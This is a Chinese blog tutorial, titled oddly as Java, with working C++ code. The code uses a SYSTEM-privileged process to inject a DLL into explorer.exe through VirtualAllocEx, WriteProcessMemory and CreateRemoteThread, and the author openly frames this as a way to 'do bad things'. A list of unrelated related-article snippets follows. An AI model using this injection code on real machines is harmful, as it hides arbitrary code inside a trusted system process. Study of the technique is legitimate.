java远程线程注入_系统权限远程线程注入到Explorer.exe
提升为系统权限,注入到explorer中
一丶简介
我们上一面说了系统服务拥有系统权限.并且拥有system权限.还尝试启动了一个进程.
那么我们是不是可以做点坏事了.
我们有一个系统权限进程.而调用 CreateRemoteThread可以创建远程线程,是否可以注入到我们桌面资源管理器当中那.
答案是可以的.我也试过提权的方式注入.可惜都是拒绝访问.所以我提升为system权限(系统服务,创建的我们进程就是system权限)
然后进行注入的.最后是可以注入的.
我们资源管理器是64位的,所以我们的进程需要也是64.我们的DLL 也要64.当然网上很多32进程注入DLL到64位各种都很多.
这里为了方便.直接 64进程+64DLL进行注入的.
代码如下:
void Cx64InjectProcessDlg::OnBnClickedOk()
{
//AdjustPrivileges();
// TODO: 在此添加控件通知处理程序代码
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = { 0 };
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
if (!wcscmp(_wcsupr(pe32.szExeFile), _wcsupr(TEXT("EXPLORER.EXE"))))
{
HANDLE hProHandle =
OpenProcess(PROCESS_ALL_ACCESS,
FALSE, pe32.th32ProcessID);
//进行注入
if (NULL == hProHandle)
{
OutputDebugString(TEXT("权限失败"));
return;
}
LPVOID lpAddr = VirtualAllocEx(hProHandle, NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (NULL == lpAddr)
{
return;
}
TCHAR szBuf[MAX_PATH] = TEXT("x64Test.dll");
//GetCurrentDirectory(sizeof(szBuf), szBuf); //这三行代码主要是拼接我们的DLL,DLL是我们自己写的
//wcscat(szBuf, TEXT("x64Test.dll"));//DLL这里就不写了,用我的吧,我会发上去的
OutputDebugString(szBuf);
BOOL bRet = WriteProcessMemory(hProHandle, lpAddr, szBuf, wcslen(szBuf) + 2, NULL);
if (!bRet)
{
return;
}
HANDLE hThreadHandle = CreateRemoteThread(hProHandle,
NULL,
0,
(LPTHREAD_START_ROUTINE)LoadLibrary,
lpAddr,
0,
NULL);
if (!hThreadHandle)
{
OutputDebugString(TEXT("注入失败了"));
return;
}
OutputDebugString(TEXT("注入了"));
return;
}
} while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle(hProcessSnap);
return CDialogEx::OnOK();
}
二丶注入效果图
java远程线程注入_系统权限远程线程注入到Explorer.exe相关推荐
- 远程linux桌面的工具xshell,Xshell如何远程桌面连接Linux系统 Xshell远程桌面连接Linux系统操作流程...
Xshell如何远程桌面连接Linux系统?Linux系统和Windows系统不一样,要远程Linux系统需借助工具.下文中为大家带来了Xshell远程桌面连接Linux系统操作流程,感兴趣的朋友快来 ...
- 另一用户已连接到此远程计算机win10,高手教你如何开启Win10远程桌面连接_开启Win10远程桌面连接的方法...
Win10电脑开启远程桌面能够帮助我们更好地控制另一端的电脑,这就是远程桌面最强大的功能,因此广受大家喜爱.不过,新手第一次接触不懂如何开启win10远程桌面连接,网上方法也有很多,但比较零碎.因此, ...
- 05_SQL注入_功能语句报错注入盲注
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 [本章代码来源于pikachu和sqli-lab中的靶场] 开发中,根据不同的需 ...
- linux 修改最大线程,修改linux系统用户最大线程数限制
遇到了坑就记下来,养成一个好习惯,利人利己.java tomcat启动后总是报错:java.lang.OutOfMemoryError: unable to create new native thr ...
- 为什么preparedstatement能防止sql注入_使用Python防止SQL注入攻击的实现示例
文章背景 每隔几年,开放式Web应用程序安全项目就会对最关键的Web应用程序安全风险进行排名.自第一次报告以来,注入风险高居其位!在所有注入类型中,SQL注入是最常见的攻击手段之一,而且是最危险的.由 ...
- main线程 子线程 顺序_面试官:线程池如何按照core、max、queue的执行顺序去执行?详解...
前言 这是一个真实的面试题. 前几天一个朋友在群里分享了他刚刚面试候选者时问的问题:"线程池如何按照core.max.queue的执行循序去执行?". 我们都知道线程池中代码执行顺 ...
- factorybean 代理类不能按照类型注入_彻底搞懂依赖注入(一)Bean实例创建过程
点击上方"Java知音",选择"置顶公众号" 技术文章第一时间送达! 上一章介绍了Bean的加载过程(IOC初始化过程),加载完成后,紧接着就要用到它的依赖注入 ...
- sql 整改措施 注入_记一次Sql注入 解决方案
老大反馈代码里面存在sql注入,这个漏洞会导致系统遭受攻击,定位到对应的代码,如下图所示 image like 进行了一个字符串拼接,正常的情况下,前端传一个 cxk 过来,那么执行的sql就是 se ...
- python并行线程倒计时_[python 并行2]线程
线程篇 基本使用 python线程使用的两个模块为: _thread (不推荐再使用). threading (查看threading的源码可以发现,threading实际是对_thread进一步的封 ...
最新文章
- sdutoj-4209-移动小球
- python教程:模块的作用与说明
- mysql索引_mysql系列:深入理解mysql 索引特性(屡试不爽的mysql索引总结)
- [Silverlight入门系列]使用MVVM模式(3):Model的INotifyPropertyChanged接口实现
- 程序员:你为什么要离职?
- [Step By Step]SAP HANA PAL多项式回归预测分析Polynomial Regression编程实例FORECASTWITHPOLYNOMIALR(预测)...
- c语言会变颜色程序,【图片】(原创)用纯C变了个变色输出字符的程序。。。【c语言吧】_百度贴吧...
- JavaWeb-Servlet--day01(笔记)
- NetAssist网络调试助手,学习网络编程第一步
- win10字体安装_Win10操作系统下字体的安装教程(非常详细,适合新手DIY)
- 数据分析之描述性统计分析
- Android客户端上开发人人客户端系列教程
- 全系列三极管应用参数
- 精品微信小程序校园第二课堂在线学习网+后台系统|前后分离VUE
- 网络推广是竞价好,还是优化好
- 王者显示重连服务器失败,最强王者三国手游服务器连接失败 最强王者三国手游曹操学什么技能...
- scott.emp视图或表不存在,解决scott用户解锁问题
- 冲天炉节能环保:烟气净化及烟气余热回收
- aac转化为mp3,aac格式转mp3教程
- 继续摘抄:postfix最新源码病毒过滤和反垃圾实战篇